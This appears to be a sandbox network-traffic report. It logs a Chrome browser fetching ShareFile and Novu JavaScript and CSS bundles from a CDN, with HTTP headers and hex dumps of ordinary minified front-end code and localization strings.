                                                                                                                                                                                                                      Data Ascii: PRISE="enterprise",e.UNLIMITED="unlimited"}(qe||(qe={})),function(e){e.IN_APP="in_app",e.MULTI_CHANNEL="multi_channel",e.DELAY="delay",e.TRANSLATION="translation",e.DIGEST="digest"}(He||(He={})),function(e){e.ENGINEER="engineer",e.ENGINEERING_MANAGER="eng
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 5f 4d 49 4e 55 53 5f 31 33 3d 22 45 74 63 2f 47 4d 54 2d 31 33 22 2c 65 2e 45 54 43 5f 47 4d 54 5f 4d 49 4e 55 53 5f 31 34 3d 22 45 74 63 2f 47 4d 54 2d 31 34 22 2c 65 2e 45 54 43 5f 47 4d 54 5f 4d 49 4e 55 53 5f 32 3d 22 45 74 63 2f 47 4d 54 2d 32 22 2c 65 2e 45 54 43 5f 47 4d 54 5f 4d 49 4e 55 53 5f 33 3d 22 45 74 63 2f 47 4d 54 2d 33 22 2c 65 2e 45 54 43 5f 47 4d 54 5f 4d 49 4e 55 53 5f 34 3d 22 45 74 63 2f 47 4d 54 2d 34 22 2c 65 2e 45 54 43 5f 47 4d 54 5f 4d 49 4e 55 53 5f 35 3d 22 45 74 63 2f 47 4d 54 2d 35 22 2c 65 2e 45 54 43 5f 47 4d 54 5f 4d 49 4e 55 53 5f 36 3d 22 45 74 63 2f 47 4d 54 2d 36 22 2c 65 2e 45 54 43 5f 47 4d 54 5f 4d 49 4e 55 53 5f 37 3d 22 45 74 63 2f 47 4d 54 2d 37 22 2c 65 2e 45 54 43 5f 47 4d 54 5f 4d 49 4e 55 53 5f 38 3d 22 45
                                                                                                                                                                                                                      Data Ascii: _MINUS_13="Etc/GMT-13",e.ETC_GMT_MINUS_14="Etc/GMT-14",e.ETC_GMT_MINUS_2="Etc/GMT-2",e.ETC_GMT_MINUS_3="Etc/GMT-3",e.ETC_GMT_MINUS_4="Etc/GMT-4",e.ETC_GMT_MINUS_5="Etc/GMT-5",e.ETC_GMT_MINUS_6="Etc/GMT-6",e.ETC_GMT_MINUS_7="Etc/GMT-7",e.ETC_GMT_MINUS_8="E
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC10212INData Raw: 29 3b 72 65 74 75 72 6e 21 28 6e 75 6c 6c 21 3d 3d 74 26 26 74 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 26 26 6e 75 6c 6c 21 3d 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 7c 7c 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 20 69 6e 20 65 7c 7c 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 6e 20 65 29 7d 2c 74 6e 3d 48 74 28 22 44 61 74 65 22 29 2c 6e 6e 3d 48 74 28 22 46 69 6c 65 22 29 2c 72 6e 3d 48 74 28 22 42 6c 6f 62 22 29 2c 61 6e 3d 48 74 28 22 46 69 6c 65 4c 69 73 74 22 29 2c 73 6e 3d 48 74 28 22 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 22 29 2c 5b 6f 6e 2c 63 6e 2c 75 6e 2c 6c 6e 5d 3d 5b 22 52 65 61 64 61 62 6c 65 53 74 72 65 61 6d 22 2c 22 52 65 71 75 65 73 74 22 2c 22 52 65 73 70
                                                                                                                                                                                                                      Data Ascii: );return!(null!==t&&t!==Object.prototype&&null!==Object.getPrototypeOf(t)||Symbol.toStringTag in e||Symbol.iterator in e)},tn=Ht("Date"),nn=Ht("File"),rn=Ht("Blob"),an=Ht("FileList"),sn=Ht("URLSearchParams"),[on,cn,un,ln]=["ReadableStream","Request","Resp
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 3e 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 61 3d 21 61 26 26 4d 6e 2e 69 73 41 72 72 61 79 28 72 29 3f 72 2e 6c 65 6e 67 74 68 3a 61 2c 6f 29 72 65 74 75 72 6e 20 4d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 28 72 2c 61 29 3f 72 5b 61 5d 3d 5b 72 5b 61 5d 2c 6e 5d 3a 72 5b 61 5d 3d 6e 2c 21 73 3b 72 5b 61 5d 26 26 4d 6e 2e 69 73 4f 62 6a 65 63 74 28 72 5b 61 5d 29 7c 7c 28 72 5b 61 5d 3d 5b 5d 29 3b 72 65 74 75 72 6e 20 74 28 65 2c 6e 2c 72 5b 61 5d 2c 69 29 26 26 4d 6e 2e 69 73 41 72 72 61 79 28 72 5b 61 5d 29 26 26 28 72 5b 61 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 7b 7d 2c 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 6c 65 74 20 72 3b 63 6f 6e 73 74 20 69 3d 6e 2e 6c 65 6e 67 74 68 3b 6c 65 74 20 61 3b 66 6f 72 28 72 3d 30 3b
                                                                                                                                                                                                                      Data Ascii: >=e.length;if(a=!a&&Mn.isArray(r)?r.length:a,o)return Mn.hasOwnProp(r,a)?r[a]=[r[a],n]:r[a]=n,!s;r[a]&&Mn.isObject(r[a])||(r[a]=[]);return t(e,n,r[a],i)&&Mn.isArray(r[a])&&(r[a]=function(e){const t={},n=Object.keys(e);let r;const i=n.length;let a;for(r=0;
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 6f 6e 73 74 20 65 3d 7b 7d 3b 5b 22 73 74 61 74 75 73 22 2c 22 73 74 61 74 75 73 54 65 78 74 22 2c 22 68 65 61 64 65 72 73 22 5d 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 65 5b 74 5d 3d 61 5b 74 5d 7d 29 29 3b 63 6f 6e 73 74 20 74 3d 4d 6e 2e 74 6f 46 69 6e 69 74 65 4e 75 6d 62 65 72 28 61 2e 68 65 61 64 65 72 73 2e 67 65 74 28 22 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 22 29 29 2c 5b 6e 2c 72 5d 3d 6f 26 26 67 72 28 74 2c 5f 72 28 49 72 28 6f 29 2c 21 30 29 29 7c 7c 5b 5d 3b 61 3d 6e 65 77 20 52 65 73 70 6f 6e 73 65 28 6b 72 28 61 2e 62 6f 64 79 2c 36 35 35 33 36 2c 6e 2c 28 28 29 3d 3e 7b 72 26 26 72 28 29 2c 68 26 26 68 28 29 7d 29 29 2c 65 29 7d 75 3d 75 7c 7c 22 74 65 78 74 22 3b 6c 65 74 20 45 3d 61 77 61 69 74 20 47 72 5b 4d 6e 2e 66 69 6e 64 4b
                                                                                                                                                                                                                      Data Ascii: onst e={};["status","statusText","headers"].forEach((t=>{e[t]=a[t]}));const t=Mn.toFiniteNumber(a.headers.get("content-length")),[n,r]=o&&gr(t,_r(Ir(o),!0))||[];a=new Response(kr(a.body,65536,n,(()=>{r&&r(),h&&h()})),e)}u=u||"text";let E=await Gr[Mn.findK
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 79 3a 6e 75 6c 6c 21 3d 3d 28 66 3d 6e 75 6c 6c 3d 3d 3d 28 70 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 70 3f 76 6f 69 64 20 30 3a 70 2e 72 65 74 72 79 29 26 26 76 6f 69 64 20 30 21 3d 3d 66 3f 66 3a 33 7d 2c 28 6e 75 6c 6c 3d 3d 3d 28 41 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 41 3f 76 6f 69 64 20 30 3a 41 2e 72 65 74 72 79 44 65 6c 61 79 29 26 26 7b 72 65 74 72 79 44 65 6c 61 79 3a 6e 75 6c 6c 3d 3d 3d 28 68 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 72 65 74 72 79 44 65 6c 61 79 7d 29 7d 7d 29 2c 74 68 69 73 2e 71 75 65 72
                                                                                                                                                                                                                      Data Ascii: y:null!==(f=null===(p=null==e?void 0:e.config)||void 0===p?void 0:p.retry)&&void 0!==f?f:3},(null===(A=null==e?void 0:e.config)||void 0===A?void 0:A.retryDelay)&&{retryDelay:null===(h=null==e?void 0:e.config)||void 0===h?void 0:h.retryDelay})}}),this.quer
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC15108INData Raw: 50 50 5f 52 45 54 45 4e 54 49 4f 4e 5f 44 41 59 53 3d 33 36 35 7d 2c 32 36 34 31 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 46 49 4c 54 45 52 5f 54 4f 5f 4c 41 42 45 4c 3d 76 6f 69 64 20 30 3b 63 6f 6e 73 74 20 72 3d 6e 28 32 30 38 37 29 3b 74 2e 46 49 4c 54 45 52 5f 54 4f 5f 4c 41 42 45 4c 3d 7b 5b 72 2e 46 69 6c 74 65 72 50 61 72 74 54 79 70 65 45 6e 75 6d 2e 50 41 59 4c 4f 41 44 5d 3a 22 50 61 79 6c 6f 61 64 22 2c 5b 72 2e 46 69 6c 74 65 72 50 61 72 74 54 79 70 65 45 6e 75 6d 2e 54 45 4e 41 4e 54 5d 3a 22 54 65 6e 61 6e 74 22 2c 5b 72 2e 46 69 6c 74 65 72 50 61 72 74 54 79
                                                                                                                                                                                                                      Data Ascii: PP_RETENTION_DAYS=365},2641:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.FILTER_TO_LABEL=void 0;const r=n(2087);t.FILTER_TO_LABEL={[r.FilterPartTypeEnum.PAYLOAD]:"Payload",[r.FilterPartTypeEnum.TENANT]:"Tenant",[r.FilterPartTy
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC1276INData Raw: 69 6e 66 6f 62 69 70 45 6d 61 69 6c 43 6f 6e 66 69 67 2c 64 6f 63 52 65 66 65 72 65 6e 63 65 3a 60 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 6e 6f 76 75 2e 63 6f 2f 63 68 61 6e 6e 65 6c 73 2d 61 6e 64 2d 70 72 6f 76 69 64 65 72 73 2f 65 6d 61 69 6c 2f 69 6e 66 6f 62 69 70 24 7b 73 2e 55 54 4d 5f 43 41 4d 50 41 49 47 4e 5f 51 55 45 52 59 5f 50 41 52 41 4d 7d 60 2c 6c 6f 67 6f 46 69 6c 65 4e 61 6d 65 3a 7b 6c 69 67 68 74 3a 22 69 6e 66 6f 62 69 70 2e 70 6e 67 22 2c 64 61 72 6b 3a 22 69 6e 66 6f 62 69 70 2e 70 6e 67 22 7d 7d 2c 7b 69 64 3a 69 2e 45 6d 61 69 6c 50 72 6f 76 69 64 65 72 49 64 45 6e 75 6d 2e 42 72 61 7a 65 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 42 72 61 7a 65 22 2c 63 68 61 6e 6e 65 6c 3a 61 2e 43 68 61 6e 6e 65 6c 54 79 70 65 45 6e 75 6d 2e 45
                                                                                                                                                                                                                      Data Ascii: infobipEmailConfig,docReference:`https://docs.novu.co/channels-and-providers/email/infobip${s.UTM_CAMPAIGN_QUERY_PARAM}`,logoFileName:{light:"infobip.png",dark:"infobip.png"}},{id:i.EmailProviderIdEnum.Braze,displayName:"Braze",channel:a.ChannelTypeEnum.E


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      57192.168.2.174977813.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC569OUTGET /sharefile-web/sharefiledev-dc-pilet/1.423.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 29 Oct 2024 09:32:16 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Mon, 04 Nov 2024 21:32:52 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 6c22fb0e883db3123ae98d8d72cdaf76.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: dWyNKndO7jm93CAE3sPZmH7v_clk5NikoHoOa6qvgLDs6I_ieQ4ULg==
                                                                                                                                                                                                                      Age: 79400
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      58192.168.2.174977713.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC415OUTGET /sharefile-web/sharefiledev-dc-pilet/1.423.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 197483
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 29 Oct 2024 09:32:16 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:11 GMT
                                                                                                                                                                                                                      ETag: "22848dd2f996ef7b688fbc1ca0d957a1"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 9e62923882d737ac8cd27f0d1b1c24ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 4T9QUFefkO41w9gUKYkX0lWKThwmsQb2-iDmXJ4OgUgL9qa3-bpzRQ==
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 63 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 2c 6c 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdcpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},i={},o={},s={},l={},c={};return Obje
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 76 65 41 73 70 65 63 74 52 61 74 69 6f 7c 70 72 69 6d 69 74 69 76 65 55 6e 69 74 73 7c 72 7c 72 61 64 69 75 73 7c 72 65 66 58 7c 72 65 66 59 7c 72 65 6e 64 65 72 69 6e 67 49 6e 74 65 6e 74 7c 72 65 70 65 61 74 43 6f 75 6e 74 7c 72 65 70 65 61 74 44 75 72 7c 72 65 71 75 69 72 65 64 45 78 74 65 6e 73 69 6f 6e 73 7c 72 65 71 75 69 72 65 64 46 65 61 74 75 72 65 73 7c 72 65 73 74 61 72 74 7c 72 65 73 75 6c 74 7c 72 6f 74 61 74 65 7c 72 78 7c 72 79 7c 73 63 61 6c 65 7c 73 65 65 64 7c 73 68 61 70 65 52 65 6e 64 65 72 69 6e 67 7c 73 6c 6f 70 65 7c 73 70 61 63 69 6e 67 7c 73 70 65 63 75 6c 61 72 43 6f 6e 73 74 61 6e 74 7c 73 70 65 63 75 6c 61 72 45 78 70 6f 6e 65 6e 74 7c 73 70 65 65 64 7c 73 70 72 65 61 64 4d 65 74 68 6f 64 7c 73 74 61 72 74 4f 66 66 73 65 74 7c
                                                                                                                                                                                                                      Data Ascii: veAspectRatio|primitiveUnits|r|radius|refX|refY|renderingIntent|repeatCount|repeatDur|requiredExtensions|requiredFeatures|restart|result|rotate|rx|ry|scale|seed|shapeRendering|slope|spacing|specularConstant|specularExponent|speed|spreadMethod|startOffset|
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 74 4d 3a 28 29 3d 3e 64 2c 75 48 3a 28 29 3d 3e 45 2c 6a 54 3a 28 29 3d 3e 4f 7d 29 3b 76 61 72 20 72 3d 6e 28 38 31 30 39 29 2c 61 3d 6e 28 38 32 32 32 29 2c 69 3d 6e 28 37 38 32 29 3b 63 6c 61 73 73 20 6f 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 2c 6e 2c 72 29 7b 73 75 70 65 72 28 65 29 2c 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 65 2c 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 3d 74 2c 74 68 69 73 2e 73 74 61 74 75 73 3d 6e 2c 74 68 69 73 2e 62 6f 64 79 3d 72 2c 74 68 69 73 2e 73 74 61 74 75 73 3d 6e 75 6c 6c 21 3d 6e 3f 6e 3a 74 2e 73 74 61 74 75 73 7d 7d 76 61 72 20 73 2c 6c 2c 63 2c 75 2c 64 2c 66 2c 70 2c 67 2c 68 3b 21 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: {"use strict";n.d(t,{tM:()=>d,uH:()=>E,jT:()=>O});var r=n(8109),a=n(8222),i=n(782);class o extends Error{constructor(e,t,n,r){super(e),this.message=e,this.response=t,this.status=n,this.body=r,this.status=null!=n?n:t.status}}var s,l,c,u,d,f,p,g,h;!function
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC14808INData Raw: 6e 28 34 34 36 37 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 65 2e 50 72 6f 74 6f 63 6f 6c 3b 28 30 2c 61 2e 41 29 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 65 6e 74 69 74 79 54 79 70 65 3d 74 2c 74 68 69 73 2e 65 6e 74 69 74 79 49 64 3d 6e 2c 74 68 69 73 2e 70 61 72 65 6e 74 52 65 73 6f 75 72 63 65 49 64 3d 72 7d 72 65 74 75 72 6e 28 30 2c 69 2e 41 29 28 65 2c 5b 7b 6b 65 79 3a 22 74 6f 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 70 61 72 65 6e 74 52 65
                                                                                                                                                                                                                      Data Ascii: n(4467),s=function(){function e(t,n){var r=arguments.length>2&&arguments[2]!==undefined?arguments[2]:e.Protocol;(0,a.A)(this,e),this.entityType=t,this.entityId=n,this.parentResourceId=r}return(0,i.A)(e,[{key:"toString",value:function(){var t=this.parentRe
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC451INData Raw: 72 20 6f 76 65 72 64 75 65 22 7d 7d 2c 70 65 72 6d 69 73 73 69 6f 6e 43 6f 6e 66 69 67 3a 7b 64 61 74 61 74 61 62 6c 65 73 3a 7b 63 61 6e 43 72 65 61 74 65 44 61 74 61 54 61 62 6c 65 52 6f 77 73 3a 22 43 61 6e 20 63 72 65 61 74 65 20 64 61 74 61 20 74 61 62 6c 65 20 72 6f 77 73 22 2c 63 61 6e 44 65 6c 65 74 65 44 61 74 61 54 61 62 6c 65 52 6f 77 73 3a 22 43 61 6e 20 64 65 6c 65 74 65 20 64 61 74 61 20 74 61 62 6c 65 20 72 6f 77 73 22 2c 63 61 6e 4d 6f 64 69 66 79 44 61 74 61 54 61 62 6c 65 52 6f 77 73 3a 22 43 61 6e 20 6d 6f 64 69 66 79 20 64 61 74 61 20 74 61 62 6c 65 20 72 6f 77 73 22 2c 63 61 6e 56 69 65 77 44 61 74 61 54 61 62 6c 65 52 6f 77 73 3a 22 43 61 6e 20 76 69 65 77 20 64 61 74 61 20 74 61 62 6c 65 20 72 6f 77 73 22 2c 73 6f 75 72 63 65 4c 61
                                                                                                                                                                                                                      Data Ascii: r overdue"}},permissionConfig:{datatables:{canCreateDataTableRows:"Can create data table rows",canDeleteDataTableRows:"Can delete data table rows",canModifyDataTableRows:"Can modify data table rows",canViewDataTableRows:"Can view data table rows",sourceLa
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 6e 67 20 4f 70 74 69 6f 6e 73 22 2c 69 6e 63 72 65 6d 65 6e 74 3a 22 49 6e 63 72 65 6d 65 6e 74 22 2c 69 74 61 6c 69 63 73 3a 22 46 6f 72 6d 61 74 20 49 74 61 6c 69 63 73 22 2c 6a 75 73 74 69 66 79 3a 22 4a 75 73 74 69 66 79 22 2c 6c 65 66 74 3a 22 4c 65 66 74 22 2c 6c 69 6e 6b 3a 22 49 6e 73 65 72 74 20 4c 69 6e 6b 22 2c 72 65 64 6f 3a 22 52 65 64 6f 22 2c 72 69 67 68 74 3a 22 52 69 67 68 74 22 2c 73 68 72 69 6e 6b 3a 22 45 78 69 74 20 66 75 6c 6c 73 63 72 65 65 6e 22 2c 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 22 46 6f 72 6d 61 74 20 53 74 72 69 6b 65 74 68 72 6f 75 67 68 22 2c 73 75 62 73 63 72 69 70 74 3a 22 46 6f 72 6d 61 74 20 53 75 62 73 63 72 69 70 74 22 2c 73 75 70 65 72 73 63 72 69 70 74 3a 22 46 6f 72 6d 61 74 20 53 75 70 65 72 73 63 72 69 70
                                                                                                                                                                                                                      Data Ascii: ng Options",increment:"Increment",italics:"Format Italics",justify:"Justify",left:"Left",link:"Insert Link",redo:"Redo",right:"Right",shrink:"Exit fullscreen",strikethrough:"Format Strikethrough",subscript:"Format Subscript",superscript:"Format Superscrip
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 72 65 61 74 65 20 61 20 54 61 73 6b 22 7d 2c 64 65 6c 65 74 65 46 69 65 6c 64 3a 7b 63 61 6e 63 65 6c 3a 22 43 61 6e 63 65 6c 22 2c 63 6f 6e 74 65 6e 74 3a 22 41 72 65 20 79 6f 75 20 73 75 72 65 20 79 6f 75 20 77 69 73 68 20 74 6f 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 64 65 6c 65 74 65 20 74 68 65 20 74 61 67 73 20 66 69 65 6c 64 3f 22 2c 22 64 65 6c 65 74 65 22 3a 22 44 65 6c 65 74 65 22 2c 74 69 74 6c 65 3a 22 44 65 6c 65 74 65 20 66 69 65 6c 64 22 2c 77 61 72 6e 69 6e 67 49 63 6f 6e 4c 61 62 65 6c 3a 22 57 61 72 6e 69 6e 67 22 7d 2c 64 65 6c 65 74 65 4d 6f 64 61 6c 3a 7b 63 61 6e 63 65 6c 3a 22 43 61 6e 63 65 6c 22 2c 63 6f 6e 74 65 6e 74 3a 22 44 65 6c 65 74 69 6e 67 20 74 68 65 20 7b 7b 74 61 62 4e 61 6d 65 7d 7d 20 74 61 62 20 77 69 6c 6c 20 70 65
                                                                                                                                                                                                                      Data Ascii: reate a Task"},deleteField:{cancel:"Cancel",content:"Are you sure you wish to permanently delete the tags field?","delete":"Delete",title:"Delete field",warningIconLabel:"Warning"},deleteModal:{cancel:"Cancel",content:"Deleting the {{tabName}} tab will pe
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 75 65 22 7d 2c 6d 6f 6e 74 68 3a 7b 70 6c 75 72 61 6c 3a 22 6d 6f 6e 74 68 73 20 6f 76 65 72 64 75 65 22 2c 73 69 6e 67 75 6c 61 72 3a 22 6d 6f 6e 74 68 20 6f 76 65 72 64 75 65 22 7d 2c 77 65 65 6b 3a 7b 70 6c 75 72 61 6c 3a 22 77 65 65 6b 73 20 6f 76 65 72 64 75 65 22 2c 73 69 6e 67 75 6c 61 72 3a 22 77 65 65 6b 20 6f 76 65 72 64 75 65 22 7d 2c 79 65 61 72 3a 7b 70 6c 75 72 61 6c 3a 22 79 65 61 72 73 20 6f 76 65 72 64 75 65 22 2c 73 69 6e 67 75 6c 61 72 3a 22 79 65 61 72 20 6f 76 65 72 64 75 65 22 7d 7d 2c 70 65 72 6d 69 73 73 69 6f 6e 43 6f 6e 66 69 67 3a 7b 64 61 74 61 74 61 62 6c 65 73 3a 7b 63 61 6e 43 72 65 61 74 65 44 61 74 61 54 61 62 6c 65 52 6f 77 73 3a 22 43 61 6e 20 63 72 65 61 74 65 20 64 61 74 61 20 74 61 62 6c 65 20 72 6f 77 73 22 2c 63 61
                                                                                                                                                                                                                      Data Ascii: ue"},month:{plural:"months overdue",singular:"month overdue"},week:{plural:"weeks overdue",singular:"week overdue"},year:{plural:"years overdue",singular:"year overdue"}},permissionConfig:{datatables:{canCreateDataTableRows:"Can create data table rows",ca
